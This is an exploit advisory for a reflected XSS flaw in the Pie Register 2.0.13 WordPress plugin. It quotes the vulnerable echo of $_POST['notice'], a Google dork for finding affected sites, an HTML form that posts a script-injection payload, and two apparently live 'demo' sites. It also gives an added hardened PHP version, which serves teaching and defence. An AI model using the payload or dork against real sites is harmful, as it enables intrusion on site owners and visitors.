
Wordpress plugin Pie Register 2.0.13 XSS

Author: NULLpOint7r, Published: 17-02-2015
# Exploit Title: Wordpress plugin Pie Register 2.0.13 XSS
# Exploit Author: NULLpOint7r
# Contact me: seidbenseidok@gmail.com
# Home: http://www.sec4ever.com/home/
# Date: 2015-02-16
# Dork: inurl:/wp-content/plugins/pie-register/
# Version: 2.0.13
# Download link: https://downloads.wordpress.org/plugin/pie-register.2.0.13.zip

vulnerable code [/menus/PieRegInvitationCodes.php], lines 5-7:
// $_POST['notice'] is echoed into the page without any escaping
if(isset($_POST['notice']) && $_POST['notice'] ){
    echo '<div id="message" class="updated fade"><p><strong>' . $_POST['notice'] . '.</strong></p></div>';
}
.....

exploit:

<form method="POST" action="http://127.0.0.1/wp-content/plugins/pie-register/menus/PieRegInvitationCodes.php">
<input type="text" name="notice" value="'><script>alert(/Owned by someone/)</script>">
<input type="submit" value="Send">
</form>
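
The unescaped echo next to a hardened form, as an added example that is not code from the advisory or from the plugin. The function names `notice_vulnerable` and `notice_hardened` are hypothetical, and `htmlspecialchars()` stands in for WordPress's `esc_html()` so the script runs from the PHP CLI without WordPress loaded.

```php
<?php
// Added example, not the plugin's code. In the plugin file itself the first
// statement would be the usual WordPress direct-access guard, since the form
// above posts straight to the .php file:
//     if ( ! defined( 'ABSPATH' ) ) { exit; }

// Behaviour of lines 5-7 as published: the POST value is concatenated raw.
function notice_vulnerable(array $post): string
{
    if (isset($post['notice']) && $post['notice']) {
        return '<div id="message" class="updated fade"><p><strong>'
            . $post['notice'] . '.</strong></p></div>';
    }
    return '';
}

// Hardened form: accept only non-empty strings and HTML-encode before output.
function notice_hardened(array $post): string
{
    if (!isset($post['notice']) || !is_string($post['notice']) || $post['notice'] === '') {
        return '';
    }
    // ENT_QUOTES encodes both quote styles; ENT_SUBSTITUTE replaces invalid UTF-8.
    $safe = htmlspecialchars($post['notice'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div id="message" class="updated fade"><p><strong>'
        . $safe . '.</strong></p></div>';
}

// Constructed request bodies: the value from the advisory's form, a benign
// notice, and an array (what a notice[]=... parameter would produce).
$samples = [
    ['notice' => "'><script>alert(/Owned by someone/)</script>"],
    ['notice' => 'Invitation code added'],
    ['notice' => ['nested' => 'value']],
];

foreach ($samples as $post) {
    // Skip the raw path for arrays to avoid an "Array to string" warning.
    $raw = is_string($post['notice']) ? notice_vulnerable($post) : '(array input)';
    echo 'raw:      ', $raw, PHP_EOL;
    echo 'hardened: ', notice_hardened($post), PHP_EOL, PHP_EOL;
}
```

In the hardened output the `<script>` tag appears as `&lt;script&gt;` text inside the `<strong>` element, and the array input produces no markup at all.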

demo:
http://anthonyorio.com/
http://nigus.se/
